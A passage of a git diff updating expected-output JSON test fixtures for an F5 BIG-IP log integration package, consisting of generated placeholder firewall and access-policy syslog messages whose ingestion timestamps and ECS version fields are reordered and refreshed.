source_ip=10.109.14.142 src_geo=sitas source_port=6036 source_user=perna translated_dest_ip=10.65.35.64 translated_dest_port=2748 translated_ip_protocol=irur translated_route_domain=risnisiu translated_source_ip=10.22.231.91 translated_source_port=2652 translated_vlan=equepor vlan=897", "event": { - "ingested": "2021-06-09T10:31:51.965579600Z" + "ingested": "2021-12-14T14:42:50.150109330Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ugiatn utpe hend1170.www5.lan ptateve aliqua officiad [F5@nimadmin acl_policy_name=iavol acl_policy_type=roq acl_rule_name=iumtota action=Reject hostname=inimav5557.www5.test bigip_mgmt_ip=10.71.112.86 context_name=olor context_type=emoenim date_time=Feb 17 2019 03:30:32 dest_ip=10.57.64.102 dst_geo=rume dest_port=7667 device_product=inibusBo device_vendor=tqui device_version=1.99 drop_reason=citat errdefs_msgno=prehende errdefs_msg_name=vitaedic flow_id=remip ip_protocol=ggp severity=high partition_name=rehe route_domain=aper sa_translation_pool=gnaa sa_translation_type=tam source_ip=10.64.161.215 src_geo=modi source_port=4869 source_user=rnatur translated_dest_ip=10.29.230.203 translated_dest_port=6579 translated_ip_protocol=abi translated_route_domain=inimaven translated_source_ip=10.89.221.90 translated_source_port=5835 translated_vlan=entoreve vlan=4612", "event": { - "ingested": "2021-06-09T10:31:51.965584600Z" + "ingested": "2021-12-14T14:42:50.150109722Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "roqu dquia ommod142.www.home ptate oloreeu imipsa [F5@iscinge acl_policy_name=ora acl_policy_type=meumfug acl_rule_name=inimve action=Closed hostname=nonn1650.www.test bigip_mgmt_ip=10.88.226.76 context_name=ptas context_type=iadolo date_time=Mar 03 2019 10:33:06 dest_ip=10.217.197.29 dst_geo=aliquide dest_port=7187 device_product=tinv device_vendor=iar device_version=1.5232 drop_reason=mquela errdefs_msgno=urm errdefs_msg_name=con flow_id=aeabil ip_protocol=udp severity=low partition_name=edicta route_domain=itaspern sa_translation_pool=tau sa_translation_type=rcit source_ip=10.79.208.135 src_geo=rehende source_port=3688 source_user=erspic translated_dest_ip=10.221.199.137 translated_dest_port=6430 translated_ip_protocol=quipe translated_route_domain=evita translated_source_ip=10.140.118.182 translated_source_port=4566 translated_vlan=nia vlan=7548", "event": { - "ingested": "2021-06-09T10:31:51.965589600Z" + "ingested": "2021-12-14T14:42:50.150110131Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "npro boriosa sundeo3076.internal.test Nequepor turQ tod [F5@rsitame acl_policy_name=nsectetu acl_policy_type=untexpli acl_rule_name=smo action=Reject hostname=acons3940.api.lan bigip_mgmt_ip=10.133.48.55 context_name=lab context_type=ela date_time=Mar 17 2019 17:35:40 dest_ip=10.134.141.37 dst_geo=oreve dest_port=2538 device_product=tali device_vendor=quamnih device_version=1.2492 drop_reason=reprehen errdefs_msgno=Exce errdefs_msg_name=tocca flow_id=tinvolu ip_protocol=ipv6 severity=low partition_name=iumt route_domain=mad sa_translation_pool=mpor sa_translation_type=eddoei source_ip=10.35.73.208 src_geo=dolo source_port=6552 source_user=tia translated_dest_ip=10.126.61.230 translated_dest_port=2068 translated_ip_protocol=dolor translated_route_domain=emUteni translated_source_ip=10.189.244.22 translated_source_port=734 translated_vlan=rinre vlan=6425", "event": { - "ingested": "2021-06-09T10:31:51.965594400Z" + "ingested": "2021-12-14T14:42:50.150110510Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ident uatur dquiaco2756.home uiine mve dolorema [F5@ditautf acl_policy_name=uisnostr acl_policy_type=oditautf acl_rule_name=nula action=Established hostname=suscipit587.www.localhost bigip_mgmt_ip=10.81.154.115 context_name=ita context_type=aeratvol date_time=Apr 01 2019 00:38:14 dest_ip=10.194.94.1 dst_geo=ostr dest_port=575 device_product=boreetd device_vendor=ueporro device_version=1.4044 drop_reason=oluptat errdefs_msgno=olors errdefs_msg_name=mSecti flow_id=ius ip_protocol=icmp severity=very-high partition_name=xerci route_domain=qua sa_translation_pool=iaecons sa_translation_type=pteurs source_ip=10.35.65.72 src_geo=veni source_port=3387 source_user=reseo translated_dest_ip=10.239.194.105 translated_dest_port=3629 translated_ip_protocol=isnos translated_route_domain=ntin translated_source_ip=10.240.94.109 translated_source_port=5437 translated_vlan=ono vlan=573", "event": { - "ingested": "2021-06-09T10:31:51.965599100Z" + "ingested": "2021-12-14T14:42:50.150110897Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "consequ ine hend3901.www.localdomain nsecte miurere tat [F5@pitlabor acl_policy_name=upi acl_policy_type=olupta acl_rule_name=ape action=Established hostname=mnisiut6146.internal.local bigip_mgmt_ip=10.52.70.192 context_name=empor context_type=ate date_time=Apr 15 2019 07:40:49 dest_ip=10.234.254.96 dst_geo=obeatae dest_port=2042 device_product=orem device_vendor=dquian device_version=1.2307 drop_reason=uis errdefs_msgno=emagnaal errdefs_msg_name=uunturm flow_id=nonnumq ip_protocol=ggp severity=very-high partition_name=ntocca route_domain=emquelau sa_translation_pool=adolorsi sa_translation_type=lupt source_ip=10.38.253.213 src_geo=ncidu source_port=3369 source_user=ionem translated_dest_ip=10.248.72.104 translated_dest_port=7485 translated_ip_protocol=cusan translated_route_domain=ivelit translated_source_ip=10.150.56.227 translated_source_port=4686 translated_vlan=isnost vlan=4697", "event": { - "ingested": "2021-06-09T10:31:51.965603900Z" + "ingested": "2021-12-14T14:42:50.150111284Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "urQu idol fici312.api.host eri pitlab riosamn [F5@Malo acl_policy_name=onse acl_policy_type=enatuse acl_rule_name=veritat action=Reject hostname=borios1067.www5.home bigip_mgmt_ip=10.218.15.164 context_name=ntNeque context_type=magnidol date_time=Apr 29 2019 14:43:23 dest_ip=10.56.60.3 dst_geo=aaliq dest_port=2143 device_product=gel device_vendor=modt device_version=1.2031 drop_reason=mvolu errdefs_msgno=agn errdefs_msg_name=eritinvo flow_id=aliq ip_protocol=rdp severity=very-high partition_name=uisautei route_domain=labor sa_translation_pool=ihilmol sa_translation_type=scinge source_ip=10.62.218.239 src_geo=yCiceroi source_port=166 source_user=reh translated_dest_ip=10.73.172.186 translated_dest_port=3510 translated_ip_protocol=itte translated_route_domain=niamquis translated_source_ip=10.203.193.134 translated_source_port=6251 translated_vlan=riosa vlan=7445", "event": { - "ingested": "2021-06-09T10:31:51.965608500Z" + "ingested": "2021-12-14T14:42:50.150111676Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ore ptatema poriss2289.localdomain luptat ficiad saquaea [F5@archi acl_policy_name=caboNe acl_policy_type=ptate acl_rule_name=enimips action=Established hostname=msequ323.www.example bigip_mgmt_ip=10.60.20.76 context_name=seq context_type=uae date_time=May 13 2019 21:45:57 dest_ip=10.244.241.67 dst_geo=quaeabi dest_port=5701 device_product=ost device_vendor=mave device_version=1.2555 drop_reason=aev errdefs_msgno=uovolup errdefs_msg_name=tMaloru flow_id=rum ip_protocol=ipv6-icmp severity=very-high partition_name=ptassita route_domain=ionemul sa_translation_pool=orema sa_translation_type=its source_ip=10.10.46.43 src_geo=stiaec source_port=7346 source_user=nev translated_dest_ip=10.136.211.234 translated_dest_port=4126 translated_ip_protocol=lamcor translated_route_domain=rorsitv translated_source_ip=10.131.127.113 translated_source_port=853 translated_vlan=iamqu vlan=1324", "event": { - "ingested": "2021-06-09T10:31:51.965614600Z" + "ingested": "2021-12-14T14:42:50.150112065Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "mwrit dminimve madminim5473.mail.example reeuf orinrepr tinvo [F5@oru acl_policy_name=ainc acl_policy_type=aeab acl_rule_name=iat action=Closed hostname=tdolorem813.internal.host bigip_mgmt_ip=10.50.177.151 context_name=rsitam context_type=aliqui date_time=May 28 2019 04:48:31 dest_ip=10.206.65.159 dst_geo=fdeFini dest_port=1295 device_product=eetdolo device_vendor=issuscip device_version=1.3291 drop_reason=tqu errdefs_msgno=rinc errdefs_msg_name=hender flow_id=sBonor ip_protocol=rdp severity=high partition_name=ercitati route_domain=lapa sa_translation_pool=enia sa_translation_type=atis source_ip=10.233.181.250 src_geo=isiuta source_port=2868 source_user=ugiatq translated_dest_ip=10.187.237.220 translated_dest_port=7744 translated_ip_protocol=eumfu translated_route_domain=remap translated_source_ip=10.248.0.74 translated_source_port=6349 translated_vlan=tru vlan=2520", "event": { - "ingested": "2021-06-09T10:31:51.965636800Z" + "ingested": "2021-12-14T14:42:50.150112479Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "isautem eiusm assit1598.www5.invalid archite eruntm iades [F5@mremape acl_policy_name=nimad acl_policy_type=ionemu acl_rule_name=nul action=Established hostname=volupt4626.internal.test bigip_mgmt_ip=10.189.43.11 context_name=asper context_type=eeu date_time=Jun 11 2019 11:51:06 dest_ip=10.193.169.102 dst_geo=olab dest_port=629 device_product=olore device_vendor=mSecti device_version=1.2859 drop_reason=idid errdefs_msgno=ela errdefs_msg_name=fugits flow_id=litseddo ip_protocol=igmp severity=medium partition_name=ptasn route_domain=amrem sa_translation_pool=umdolor sa_translation_type=iamq source_ip=10.248.248.120 src_geo=ationemu source_port=1282 source_user=iatn translated_dest_ip=10.96.223.46 translated_dest_port=3654 translated_ip_protocol=pern translated_route_domain=ptasn translated_source_ip=10.80.129.81 translated_source_port=4827 translated_vlan=tat vlan=5084", "event": { - "ingested": "2021-06-09T10:31:51.965643300Z" + "ingested": "2021-12-14T14:42:50.150112866Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eruntmo lumdolo urmagnid2749.api.host imip taspe siutaliq [F5@turadipi acl_policy_name=tMalo acl_policy_type=veni acl_rule_name=rspi action=Closed hostname=ntium5103.www5.localhost bigip_mgmt_ip=10.66.106.186 context_name=uatD context_type=reh date_time=Jun 25 2019 18:53:40 dest_ip=10.36.14.238 dst_geo=metco dest_port=4740 device_product=ilmoles device_vendor=xeaco device_version=1.1910 drop_reason=ccaecat errdefs_msgno=radip errdefs_msg_name=secil flow_id=totamr ip_protocol=udp severity=very-high partition_name=iciat route_domain=uira sa_translation_pool=orio sa_translation_type=mseq source_ip=10.102.109.199 src_geo=iono source_port=2061 source_user=tNequ translated_dest_ip=10.173.114.63 translated_dest_port=5877 translated_ip_protocol=tatisetq translated_route_domain=eabilloi translated_source_ip=10.91.115.139 translated_source_port=412 translated_vlan=eroi vlan=2077", "event": { - "ingested": "2021-06-09T10:31:51.965652400Z" + "ingested": "2021-12-14T14:42:50.150113297Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "riatur amrema illum2978.internal.home rumetMa entor urere [F5@involu acl_policy_name=qui acl_policy_type=aliqu acl_rule_name=sita action=Drop hostname=orpori3334.www.local bigip_mgmt_ip=10.198.157.122 context_name=ncu context_type=quatu date_time=Jul 10 2019 01:56:14 dest_ip=10.239.90.72 dst_geo=iratio dest_port=7700 device_product=its device_vendor=agn device_version=1.3690 drop_reason=ntmo errdefs_msgno=iur errdefs_msg_name=aboNemo flow_id=tsedquia ip_protocol=udp severity=very-high partition_name=tatiset route_domain=enim sa_translation_pool=gnido sa_translation_type=iamq source_ip=10.159.155.88 src_geo=uisa source_port=7034 source_user=iquipex translated_dest_ip=10.0.175.17 translated_dest_port=5236 translated_ip_protocol=tempori translated_route_domain=sedquian translated_source_ip=10.221.223.127 translated_source_port=2687 translated_vlan=ira vlan=3007", "event": { - "ingested": "2021-06-09T10:31:51.965657900Z" + "ingested": "2021-12-14T14:42:50.150113685Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "idolor umdo sequatu7142.internal.corp ipsaqu asun rsitam [F5@magn acl_policy_name=amcola acl_policy_type=eumiurer acl_rule_name=umf action=Established hostname=equu7361.www5.localdomain bigip_mgmt_ip=10.30.20.187 context_name=rsinto context_type=nonnumqu date_time=Jul 24 2019 08:58:48 dest_ip=10.103.47.100 dst_geo=chitect dest_port=5316 device_product=fug device_vendor=ulpaq device_version=1.6302 drop_reason=piscivel errdefs_msgno=ueporr errdefs_msg_name=udex flow_id=ipexeac ip_protocol=tcp severity=low partition_name=isci route_domain=archi sa_translation_pool=rsitame sa_translation_type=qui source_ip=10.7.212.201 src_geo=ion source_port=949 source_user=ugiat translated_dest_ip=10.252.136.130 translated_dest_port=5601 translated_ip_protocol=expl translated_route_domain=animi translated_source_ip=10.189.70.237 translated_source_port=1457 translated_vlan=tnul vlan=24", "event": { - "ingested": "2021-06-09T10:31:51.965663200Z" + "ingested": "2021-12-14T14:42:50.150114080Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "radip amremap dolorsit64.www.local uredo uamni nisi [F5@onsecte acl_policy_name=iono acl_policy_type=secillum acl_rule_name=sequatD action=Established hostname=tse2979.internal.localhost bigip_mgmt_ip=10.242.121.165 context_name=aut context_type=eriti date_time=Aug 07 2019 16:01:23 dest_ip=10.88.229.78 dst_geo=imadmi dest_port=2642 device_product=tevelite device_vendor=cto device_version=1.2037 drop_reason=mquiado errdefs_msgno=agn errdefs_msg_name=dip flow_id=urmag ip_protocol=tcp severity=high partition_name=laboreet route_domain=tutlabo sa_translation_pool=incid sa_translation_type=der source_ip=10.83.105.69 src_geo=usm source_port=2153 source_user=mni translated_dest_ip=10.102.109.194 translated_dest_port=2324 translated_ip_protocol=nor translated_route_domain=saut translated_source_ip=10.60.224.93 translated_source_port=1508 translated_vlan=deomnis vlan=354", "event": { - "ingested": "2021-06-09T10:31:51.965668800Z" + "ingested": "2021-12-14T14:42:50.150114458Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tla nimve edutpe1255.internal.lan nimadm cepte paquioff [F5@ictasun acl_policy_name=iumto acl_policy_type=ciun acl_rule_name=prehe action=Accept hostname=uisnostr2390.mail.domain bigip_mgmt_ip=10.251.167.219 context_name=eaco context_type=oremeu date_time=Aug 21 2019 23:03:57 dest_ip=10.14.251.18 dst_geo=tenbyCi dest_port=4371 device_product=citation device_vendor=spernatu device_version=1.7314 drop_reason=giatq errdefs_msgno=tion errdefs_msg_name=tNeque flow_id=uidolore ip_protocol=rdp severity=medium partition_name=usB route_domain=magnaali sa_translation_pool=istenatu sa_translation_type=roqui source_ip=10.17.20.93 src_geo=eritqu source_port=4368 source_user=Uteni translated_dest_ip=10.181.134.69 translated_dest_port=551 translated_ip_protocol=norum translated_route_domain=emUten translated_source_ip=10.219.174.45 translated_source_port=4055 translated_vlan=idolo vlan=968", "event": { - "ingested": "2021-06-09T10:31:51.965674Z" + "ingested": "2021-12-14T14:42:50.150114839Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "mmodicon nisis edquia4523.www.host remap ntium veniamqu [F5@equat acl_policy_name=reeu acl_policy_type=atemacc acl_rule_name=rsitvolu action=Accept hostname=luptate4811.mail.example bigip_mgmt_ip=10.30.117.82 context_name=destlabo context_type=fficia date_time=Sep 05 2019 06:06:31 dest_ip=10.245.75.229 dst_geo=elaud dest_port=4916 device_product=eaqueip device_vendor=emUten device_version=1.596 drop_reason=itseddoe errdefs_msgno=iti errdefs_msg_name=evitaedi flow_id=ionulamc ip_protocol=tcp severity=high partition_name=culp route_domain=Ciceroin sa_translation_pool=aeco sa_translation_type=olores source_ip=10.223.99.90 src_geo=adminim source_port=4324 source_user=numqua translated_dest_ip=10.28.233.253 translated_dest_port=1159 translated_ip_protocol=mUten translated_route_domain=eursint translated_source_ip=10.37.14.20 translated_source_port=6531 translated_vlan=teurs vlan=4919", "event": { - "ingested": "2021-06-09T10:31:51.965679300Z" + "ingested": "2021-12-14T14:42:50.150115262Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "aaliq nos uaUteni562.www.test deF dutpe tseddoei [F5@byCi acl_policy_name=odic acl_policy_type=chitecto acl_rule_name=nimadm action=Closed hostname=lites1614.www.corp bigip_mgmt_ip=10.125.20.22 context_name=olu context_type=ectet date_time=Sep 19 2019 13:09:05 dest_ip=10.121.189.113 dst_geo=tess dest_port=4686 device_product=xeacom device_vendor=adminim device_version=1.95 drop_reason=henderi errdefs_msgno=rainc errdefs_msg_name=dminim flow_id=sse ip_protocol=tcp severity=high partition_name=umexe route_domain=Sedu sa_translation_pool=tetur sa_translation_type=ern source_ip=10.50.61.114 src_geo=nvento source_port=649 source_user=qua translated_dest_ip=10.57.85.113 translated_dest_port=1024 translated_ip_protocol=itquii translated_route_domain=psu translated_source_ip=10.8.32.17 translated_source_port=3788 translated_vlan=nem vlan=5883", "event": { - "ingested": "2021-06-09T10:31:51.965684600Z" + "ingested": "2021-12-14T14:42:50.150115648Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sitasper agni ivelit1640.internal.lan iscive prehende volup [F5@nimi acl_policy_name=niamqu acl_policy_type=uioffi acl_rule_name=suntin action=Closed hostname=lorinrep7686.mail.corp bigip_mgmt_ip=10.200.28.55 context_name=ineavol context_type=abor date_time=Oct 03 2019 20:11:40 dest_ip=10.232.122.152 dst_geo=voluptat dest_port=1549 device_product=ipi device_vendor=lamcor device_version=1.3064 drop_reason=litesse errdefs_msgno=tam errdefs_msg_name=uovo flow_id=scivelit ip_protocol=icmp severity=low partition_name=empo route_domain=apa sa_translation_pool=colab sa_translation_type=sistenat source_ip=10.215.224.27 src_geo=Sedutper source_port=6726 source_user=ficiade translated_dest_ip=10.113.78.101 translated_dest_port=2707 translated_ip_protocol=amqua translated_route_domain=nsequatu translated_source_ip=10.181.63.82 translated_source_port=168 translated_vlan=tse vlan=4029", "event": { - "ingested": "2021-06-09T10:31:51.965689800Z" + "ingested": "2021-12-14T14:42:50.150116047Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ueip amvo dolorsi306.www5.local tten erit asiarch [F5@tob acl_policy_name=tiae acl_policy_type=imipsamv acl_rule_name=doeiu action=Established hostname=nderit6272.mail.example bigip_mgmt_ip=10.177.14.106 context_name=natuser context_type=olupt date_time=Oct 18 2019 03:14:14 dest_ip=10.239.142.115 dst_geo=nsec dest_port=6720 device_product=siarchi device_vendor=etq device_version=1.4522 drop_reason=archit errdefs_msgno=nde errdefs_msg_name=tNequepo flow_id=byCicer ip_protocol=ipv6 severity=medium partition_name=ipit route_domain=tdolorem sa_translation_pool=nderitin sa_translation_type=mquiado source_ip=10.169.95.128 src_geo=reeufugi source_port=7737 source_user=ofd translated_dest_ip=10.139.20.223 translated_dest_port=114 translated_ip_protocol=porincid translated_route_domain=tisetqu translated_source_ip=10.243.43.168 translated_source_port=2110 translated_vlan=ehenderi vlan=2215", "event": { - "ingested": "2021-06-09T10:31:51.965695Z" + "ingested": "2021-12-14T14:42:50.150116520Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ipsu iden oreseo1541.mail.domain boriosam lites col [F5@litsedd acl_policy_name=mnis acl_policy_type=ainci acl_rule_name=aturve action=Established hostname=ntu1279.mail.lan bigip_mgmt_ip=10.92.168.198 context_name=rume context_type=uptate date_time=Nov 01 2019 10:16:48 dest_ip=10.115.225.57 dst_geo=orsit dest_port=3315 device_product=mnis device_vendor=tametco device_version=1.7456 drop_reason=inc errdefs_msgno=rroqui errdefs_msg_name=amr flow_id=mfug ip_protocol=tcp severity=low partition_name=mid route_domain=henderi sa_translation_pool=consec sa_translation_type=dquia source_ip=10.90.93.4 src_geo=rehe source_port=3382 source_user=adminima translated_dest_ip=10.39.100.88 translated_dest_port=5195 translated_ip_protocol=lup translated_route_domain=rsi translated_source_ip=10.18.176.44 translated_source_port=7284 translated_vlan=Utenimad vlan=4305", "event": { - "ingested": "2021-06-09T10:31:51.965700100Z" + "ingested": "2021-12-14T14:42:50.150116910Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Bon amquisno mullam6505.www.localhost siarch oloremi ididu [F5@uov acl_policy_name=ncidid acl_policy_type=audantiu acl_rule_name=lmolest action=Reject hostname=essequam1161.domain bigip_mgmt_ip=10.49.68.8 context_name=temUte context_type=idest date_time=Nov 15 2019 17:19:22 dest_ip=10.8.247.249 dst_geo=enimip dest_port=3957 device_product=ataevit device_vendor=ficiad device_version=1.2909 drop_reason=taspe errdefs_msgno=empori errdefs_msg_name=mipsum flow_id=tium ip_protocol=tcp severity=very-high partition_name=ota route_domain=boriosa sa_translation_pool=eprehen sa_translation_type=rehen source_ip=10.163.203.191 src_geo=exeacom source_port=2599 source_user=tlab translated_dest_ip=10.193.43.135 translated_dest_port=4650 translated_ip_protocol=iaeconse translated_route_domain=onevol translated_source_ip=10.173.13.179 translated_source_port=1211 translated_vlan=ptasn vlan=3791", "event": { - "ingested": "2021-06-09T10:31:51.965705400Z" + "ingested": "2021-12-14T14:42:50.150117304Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ctetur amqui itatise2264.invalid lup cipitla niam [F5@mullamc acl_policy_name=umtota acl_policy_type=ssecil acl_rule_name=xplic action=Closed hostname=cipitl2184.localdomain bigip_mgmt_ip=10.240.47.113 context_name=uisnost context_type=snul date_time=Nov 30 2019 00:21:57 dest_ip=10.191.241.249 dst_geo=Loremips dest_port=4361 device_product=tiset device_vendor=ciade device_version=1.7726 drop_reason=equ errdefs_msgno=rror errdefs_msg_name=Exce flow_id=uae ip_protocol=ggp severity=high partition_name=umdol route_domain=nseq sa_translation_pool=autodita sa_translation_type=loreme source_ip=10.84.64.28 src_geo=par source_port=3938 source_user=ull translated_dest_ip=10.209.226.7 translated_dest_port=7745 translated_ip_protocol=aeabi translated_route_domain=ore translated_source_ip=10.31.147.51 translated_source_port=7780 translated_vlan=ptate vlan=3154", "event": { - "ingested": "2021-06-09T10:31:51.965710700Z" + "ingested": "2021-12-14T14:42:50.150117881Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "fugit dantiu ntutla1447.invalid strude rautodi Loremips [F5@mestqui acl_policy_name=tect acl_policy_type=odtem acl_rule_name=ite action=Closed hostname=item3647.home bigip_mgmt_ip=10.32.20.4 context_name=olupta context_type=dents date_time=Dec 14 2019 07:24:31 dest_ip=10.166.40.137 dst_geo=oremipsu dest_port=5644 device_product=idolor device_vendor=tionem device_version=1.292 drop_reason=oinB errdefs_msgno=tateve errdefs_msg_name=rsitvo flow_id=enatuser ip_protocol=tcp severity=high partition_name=sistena route_domain=reetdolo sa_translation_pool=psam sa_translation_type=litseddo source_ip=10.225.189.229 src_geo=odtem source_port=2287 source_user=odtemp translated_dest_ip=10.86.1.244 translated_dest_port=7101 translated_ip_protocol=rinci translated_route_domain=uamestqu translated_source_ip=10.52.13.192 translated_source_port=4714 translated_vlan=remagna vlan=439", "event": { - "ingested": "2021-06-09T10:31:51.965715700Z" + "ingested": "2021-12-14T14:42:50.150118279Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/f5/data_stream/bigipapm/_dev/test/pipeline/test-generated.log-expected.json b/packages/f5/data_stream/bigipapm/_dev/test/pipeline/test-generated.log-expected.json index e66ebdd6cf9..baa95613555 100644 --- a/packages/f5/data_stream/bigipapm/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/f5/data_stream/bigipapm/_dev/test/pipeline/test-generated.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "January 2016/01/29 06:09:59 aliqu high equepor[6720]: 01490106: :dolore: sequa: AD module: authentication with 'abo' failed: Preauthentication failed, principal name: squira. success reeufugi", "event": { - "ingested": "2021-06-09T10:31:52.608600300Z" + "ingested": "2021-12-14T14:42:51.960173505Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 2016/02/12 13:12:33 billoi medium orev[6153]: 01490504: :tatemU: deF: sist1803.mail.local can not be resolved.", "event": { - "ingested": "2021-06-09T10:31:52.608618200Z" + "ingested": "2021-12-14T14:42:51.960175866Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 2016/02/26 20:15:08 aqui low sSMTP[1166]: isetq", "event": { - "ingested": "2021-06-09T10:31:52.608641800Z" + "ingested": "2021-12-14T14:42:51.960176386Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 2016/03/12 03:17:42 seq high crond[5738]: (ccaecat) veleumi", "event": { - "ingested": "2021-06-09T10:31:52.608647800Z" + "ingested": "2021-12-14T14:42:51.960176790Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 2016/03/26 10:20:16 ude very-high veri[5990]: 01490113: :tempo: inv: session.user.clientip is 10.134.175.248", "event": { - "ingested": "2021-06-09T10:31:52.608652200Z" + "ingested": "2021-12-14T14:42:51.960177190Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2016/04/09 17:22:51 lupta low rsitvolu[2044]: 01490128: :pori: occ: Webtop ect assigned", "event": { - "ingested": "2021-06-09T10:31:52.608656600Z" + "ingested": "2021-12-14T14:42:51.960177591Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2016/04/24 00:25:25 aedic high gni: [syslog-ng]", "event": { - "ingested": "2021-06-09T10:31:52.608660400Z" + "ingested": "2021-12-14T14:42:51.960179768Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 2016/05/08 07:27:59 labor low isqu: 01490167: :uis: Current snapshot ID: idolore updated inside session db for access profile: onse", "event": { - "ingested": "2021-06-09T10:31:52.608664300Z" + "ingested": "2021-12-14T14:42:51.960180185Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 2016/05/22 14:30:33 metcon low emeumfug[6823]: 01490505: :emporinc: untutlab: tem", "event": { - "ingested": "2021-06-09T10:31:52.608668200Z" + "ingested": "2021-12-14T14:42:51.960180589Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 2016/06/05 21:33:08 tessec very-high ali[6446]: sSMTP: ", "event": { - "ingested": "2021-06-09T10:31:52.608671800Z" + "ingested": "2021-12-14T14:42:51.960181211Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 2016/06/20 04:35:42 riat medium atvol[98]: 014d0044: :uames: tati", "event": { - "ingested": "2021-06-09T10:31:52.608675600Z" + "ingested": "2021-12-14T14:42:51.960181594Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 2016/07/04 11:38:16 sinto very-high CSed[2857]: 01490514: :utlabore: ecillu: Access encountered error: success. File: mnisist, Function: deny, Line: icons", "event": { - "ingested": "2021-06-09T10:31:52.608679500Z" + "ingested": "2021-12-14T14:42:51.960182187Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 2016/07/18 18:40:50 lum high CROND[1675]: (sitvolup) CMD (cancel)", "event": { - "ingested": "2021-06-09T10:31:52.608683200Z" + "ingested": "2021-12-14T14:42:51.960182582Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2016/08/02 01:43:25 uipe very-high siarchi[2289]: 01490500: :aliqu: olupta:mipsumd:eFinib: New session from client IP 10.204.123.107 (ST=saute/CC=ercit/C=usmodt) at VIP 10.225.160.182 Listener mque", "event": { - "ingested": "2021-06-09T10:31:52.608686800Z" + "ingested": "2021-12-14T14:42:51.960182968Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2016/08/16 